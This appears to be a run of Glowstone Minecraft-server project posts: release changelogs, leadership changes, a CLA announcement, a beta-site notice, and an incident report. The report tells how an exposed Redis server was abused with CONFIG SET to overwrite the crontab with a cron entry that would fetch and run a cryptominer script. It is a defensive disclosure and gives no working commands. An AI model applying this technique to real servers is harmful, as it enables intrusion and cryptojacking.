Hi everyone, we are releasing Glowstone 2017.8.1, which is the first official release to support 1.12.1. Not much has happened since 2017.8.0, but here's the changelog nonetheless:
/tp player toplayernot doing anything (#554)
We've had a slow schedule this month, mostly due to everyone being busier than usual.
I have personally stepped down as project lead and have given this responsibility back to mastercoms because I will have much less time to give to this project due to college and other stuff.
Also, I'd like to welcome Postremus to our development team. He has been working a lot on this project recently and has implemented a lot of major features, including leashes this month.
That's it for now, we'll see you guys later! :^)
Hello again. Today we are releasing Glowstone 2017.8.0, which is the last release to support Minecraft 1.12. Since 1.12.1 was released, we will now bump our version to
2017.8.1 which will be released at the end of August (unless Mojang pushes another protocol update).
Since we released 2017.7.0 less than a week ago, not much has changed. Here is the changelog since that release:
We are now working on updating Glowstone to 1.12.1, which will be officially supported in the next monthly release (2017.8.1).
Hello again! The time has come for us to publish this month's release for Glowstone, 2017.7.0. We have plenty of new features this time around, including boats and paintings, as well as many bug fixes since 2017.6.1.
There has been a total of 40 commits by 8 contributors in July, with 4,491 additions and 730 deletions in 122 files.
I have personally been working on implementing pathfinding for Entity AI. After several months of on-and-off work on this issue, I have found an efficient solution to implement it, and I am aiming to have it all functional for the next release (2017.8).
We are continuously updating our Beta site with new features, and we are looking forward to your feedback. We are planning to have a complete 'Download Center' for Glowstone on there in the near future!
This is a post to notify everyone of a possible intrusion relating to the forum. I have provided a full report in an effort to be as transparent as possible.
Momo noticed that the forums were down. I was asleep at the time, and did not get the message until the morning - it was late at night.
I got Momo's message, and investigated the problem. I assumed that Redis was down, so I restarted it and updated and restarted the forums, and everything appeared to be working just fine. I noticed that the plugins we had installed were removed, and so I reinstalled them. No configuration data was lost. I also noticed that a couple of posts I had made a day or two before that were missing.
I noticed that a Nextcloud install on a different VM (my personal install) was using the same database server as a memory cache, despite being configured not to. I reconfigured Nextcloud and removed all of its cached data from the database. Nextcloud did not touch any actual NodeBB data, so that wasn't the cause of the issue.
At this point, we realised that data going back around a month and a half had been lost. Fearing further data loss, I set up some cron tasks to force Redis to save its data and save a backup every hour. I checked the Redis logs and there was nothing abnormal in them, so I assumed the problem was with NodeBB and continued investigating with Momo.
After reading over NodeBB logs, events and errors, we found nothing of interest.
At around 4AM BST, Momo became available again and continued his investigation. He discovered two things:
At around 8:30AM BST, I came online and restarted my investigation.
Due to an issue with Proxmox (the hypervisor I use to manage containers and VMs and keep things compartmentalised), it turned out that the firewall I had configured was not doing its job - instead of dropping all disallowed traffic as it was meant to, it was simply allowing everything. I fixed this problem by setting up a firewall directly on the storage container and this secured it from the outside.
I noticed that Redis was attempting to save data to
/var/spool/cron, which is not its usual location. It did not have permission to write there - which is why it was failing to save data. Upon further investigation, I noticed that it was able to overwrite the crontab I had set up earlier - and had done so with the entire contents of the database. At this point, I took down both Redis and NodeBB so that I could fix things up.
I wiped all of the cron storage directories and reinstalled cron. I double-checked the Redis configuration and found nothing unusual, so I restarted that as well. It started up correctly and did not attempt to write to
I used a GUI tool to inspect the Redis data, and I noticed that the data I had removed previously (from Nextcloud) was still present. I removed it again, and I noticed an extra key that I hadn't seen earlier: It was a randomized key, containing a crontab entry. This crontab was configured to download a shell script from an IP address and execute it.
I grabbed a copy of the script myself and took a look at it, and it simply downloaded a cryptocurrency miner and ran it. Upon investigation, it was clear that this crontab had never been run, and that the attack was supposed to play out as follows:
CONFIG SETcommand to overwrite the crontab with the database
The cron daemon I'm using performs very strict syntax checks and did not run the crontab - as soon as it realised there were invalid "entries" in the file, it errored out.
I removed the key from the database and made sure the forum was running correctly.
While there was absolutely no evidence that this attack targetted NodeBB or even Glowstone specifically, precautions should always be taken. As NodeBB stores its entire database in Redis, all of the data therein was exposed. It's impossible to say what the attackers may have taken - if anything - but as always, users should take all of the necessary precautions.
NodeBB stores passwords using
bcrypt. This is an industry standard and currently considered very secure, but we still advise users to change their passwords - both on the forums, and on any accounts they own elsewhere that may be using the same password as their forum account. Note that any other data provided during registration and profile modification will have been accessible as well - for example, email addresses.
I have revoked all the user tokens from GitHub OAuth, and reset the client secret, to protect users' GitHub accounts.
I'd like to apologise for this intrusion personally - it definitely shouldn't have happened, and while I'm amazed that it did, it is my responsibility. Please don't attack or bug any of the other staff members - they don't have direct access to any of this stuff.
As far as I am aware, everything is now secure and in working order, but I'm going to continue monitoring and testing throughout the day. Feel free to contact me if you have any questions.
Hello! We are releasing Glowstone 2017.6.1 today, the first release which officially supports Minecraft 1.12. This release consists mostly of the update to 1.12, some extra fixes to the server software and some community updates.
@scommand target selector
Due to recent personal life events, Jessica (otherwise known as mastercoms) has decided to step down as project lead of Glowstone, after 3 years of continuous devotion for this awesome project. I would like to personally thank her for her immense help and love for this community over the past months and years.
The "core" Glowstone project team consists of Jessica, myself and Gareth (a.k.a. gdude2002). This will remain, as Jessica will continue to contribute to Glowstone, but she has decided to let go of her lead responsibilities to focus on other projects and ventures. Since the project still needs a leading entity, I will be taking this responsibility starting this month, and Gareth will continue helping as the project's community lead — he is far more active with the community than I can be.
If you have questions or concerns considering this transition, please feel free to let us know on the forums, Discord, IRC, or privately at your own wish.
In April, satoshinm posted a rather interesting project named WebSandboxMC, which is a WebGL-based in-browser client powered by a Glowstone-compatible Bukkit plugin — essentially allowing you to browse and interact with a Minecraft server directly in the browser.
Over the past month, satoshi has been running a test server to find bugs and missing features in WebSandboxMC and since he's accomplished his goal, the server has been closed. If you're interested in the statistics, you can read all about it in his recent post on the subject.
WebSandboxMC is certainly a very interesting project, and is definitely worth a look by any server admin interested in this kind of interaction!
This is an announcement to let everyone know that we have come up with a CLA, otherwise known as a Contributor License Agreement. It's something we've been thinking about doing for a while, but decided that it deserved extra attention in light of the swift movement on Bountysource.
CLAs can look a bit scary, but every contributor submitting a pull request to Glowstone will be required to sign it. We've attempted to make that process as easy as possible - going forward, any new pull requests will automatically get a comment from the CLA helper. To sign the CLA, simply click the button in that comment and sign in with GitHub on the CLA helper site.
In short, by signing the Glowstone CLA, you confirm that:
If you'd like to read the CLA yourself, it's available here.
Note that we are not requiring previous contributors to sign the CLA, but if you do sign it, it applies retroactively.
If you would like to sign off your own bat before you make any further contributions or do any more work on your forks, feel free to do so here.
Hello, fellow Glowstone... ers...?
Welcome to the beta version of the new site! We've decided that the site could use a small facelift and the addition of some much-needed functionality, and this is a preview of what's to come. Some of the things you can look forward to include:
Currently the beta site is in a relatively early stage, and not everything works. We would appreciate if you are able to give us feedback on this - you can do so on GitHub, on the forums, or on Discord.
We want to make sure this site will work well for everyone, so don't be afraid to speak up if there's something you don't like!